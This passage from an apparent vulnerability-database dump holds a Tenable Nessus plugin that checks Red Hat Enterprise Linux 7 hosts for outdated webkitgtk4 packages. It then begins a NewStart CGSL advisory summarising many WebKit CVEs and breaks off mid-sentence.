script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876653\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876655\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876656\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876657\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876664\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876880\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876881\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876883\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876887\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876891\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876892\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876893\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876895\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876897\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876898\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877047\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877048\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1986877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1986894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1986898\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 79, 94, 119, 200, 400, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/debug',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/os',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/os',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/7/7Client/x86_64/os',\n 'content/dist/rhel/client/7/7Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/os',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/os',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/os',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/7/7Server/x86_64/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/os',\n 'content/fastrack/rhel/client/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/os',\n 'content/fastrack/rhel/client/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/debug',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/os',\n 'content/fastrack/rhel/computenode/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/os',\n 'content/fastrack/rhel/power/7/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/os',\n 'content/fastrack/rhel/power/7/ppc64/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/optional/debug',\n 'content/fastrack/rhel/server/7/x86_64/optional/os',\n 'content/fastrack/rhel/server/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/os',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/os',\n 'content/fastrack/rhel/system-z/7/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/os',\n 'content/fastrack/rhel/system-z/7/s390x/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/os',\n 'content/fastrack/rhel/workstation/7/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkitgtk4-2.28.2-2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-doc-2.28.2-2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkitgtk4 / webkitgtk4-devel / webkitgtk4-doc / webkitgtk4-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-09T14:44:27", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has webkitgtk4 packages installed that are affected by multiple vulnerabilities:\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-7285)\n\n - A validation issue was addressed with improved logic. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2019-7292)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. A malicious website may be able to execute scripts in the context of another website. (CVE-2019-8503)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - A cross-origin issue existed with the fetch API. This was addressed with improved input validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11.\n Processing maliciously crafted web content may disclose sensitive user information. (CVE-2019-8515)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8644, CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8684, CVE-2019-8688, CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1, iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 